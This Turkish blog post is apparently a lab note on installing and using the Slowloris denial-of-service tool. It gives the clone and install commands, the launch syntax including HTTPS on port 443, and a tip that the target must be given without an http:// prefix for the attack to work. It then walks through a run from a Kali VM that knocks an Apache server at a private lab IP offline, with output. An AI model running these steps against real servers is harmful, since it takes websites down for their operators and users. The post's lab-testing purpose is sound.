Slowloris Kurulum ve Kullanımı

a. Kurulumu

(*) Not:

Slowloris aracı github’dan indirilmiş klasör halinde Downloads klasörü altında yer almakta: slowloris-master.zip

git clone https://github.com/gkbrk/slowloris.git
chmod -R 777 slowloris/
cd slowloris
python3 slowloris.py --help
veya
sudo su
apt-get install python3-pip
pip3 install slowloris
slowloris --help

b. Kullanımı

(-) Uyarı:

Tool’a adres eklerken http veya https öneki adreste belirtilmemeli. Aksi takdirde tool çalışmıyor ve socket count çıktısı hep 0 veriyor. Belirtilmediğinde socket count default değeri 150 veriyor ve çalışıyor. Tool default olarak port 80’e paket gönderimi yapılıyor. Eğer site https ise --https parametresi eklenmeli. SSL modulü çıktıda belirttiği gibi import ediyor. Port parametresi için de 443 ilave olarak eklenebilir.

python3 slowloris.py example.com		
python3 slowloris.py -p 443 --https example.com

c. Uygulama

(+) Birebir denendi ve başarıyla uygulandı.

Gereksinimler

Ubuntu 18.04 LTS - Apache                   // Hedef : Ana Makine
Tubitak Kali (Ekim, 2020) - Slowloris     // Saldırı: Sanal Makine

Ubuntu 18.04 LTS ana makinesindeki apache sunucuya Kali Tubitak sanal makinesinden slowloris aracı ile slowloris saldırısı uygulanacaktır.

Kali Tubitak:

// İndirme
git clone https://github.com/gkbrk/slowloris.git
chmod -R 777 slowloris/
cd slowloris

// Çalıştırma
python3 slowloris.py 192.168.0.15			// Ubuntu 18.04 LTS IP’si

Çıktı:

[16-07-2021 18:06:44] Attacking 192.168.0.15 with 150 sockets.
[16-07-2021 18:06:44] Creating sockets...


(-) UYARI :

Eğer saldırıyı şu şekilde başlatırsak saldırı başarısız oluyor.

python3 slowloris.py http://192.168.0.15

Apache sunucu hiç etkilenmiyor ve çıktıda socket count : 0 olarak yansıyor. http:// veya https:// ön eki belirtmeden direk domain adı (veya ip’si) girilmeli.

Saldırı başladığında ubuntu 18.04 lts ana makinesindeki apache sunucunun web erişimi kopacaktır.

Ubuntu 18.04 LTS Chrome:

// Erişim Denemesi
http://localhost

Çıktı:

(~) Yükleniyor...

Saldırı sonlandırıldığında erişim geliyor.

Kali Tubitak:

// Durdurma
python3 slowloris.py 192.168.0.15

Çıktı:

[16-07-2021 18:06:44] Attacking 192.168.0.15 with 150 sockets.
[16-07-2021 18:06:44] Creating sockets...
[16-07-2021 18:06:48] Sending keep-alive headers… Socket count: 150
...
...
C^

Ubuntu 18.04 LTS Chrome:

// Erişim Denemesi
http://localhost	

Çıktı:

...
... // Apache sunucudaki kök dizinde yer alan dizinler ve dosyalar ekrana gelir.
...

Yararlanılan Kaynaklar:

  • https://github.com/gkbrk/slowloris
Bu yazı 18.03.2026 tarihinde, saat 13:52:39'de yazılmıştır. 18.03.2026 tarihi ve 11:11:12 saatinde ise güncellenmiştir.
Yazar : Hasan Fatih ŞİMŞEK Görüntülenme Sayısı : 4
Yorumlar
Henüz yorum girilmemiştir.
Yorum Ekle
*
* (E-posta adresiniz yayınlanmayacaktır.)
*
*

#Arşiv


#Giriş

ID :
Şifre :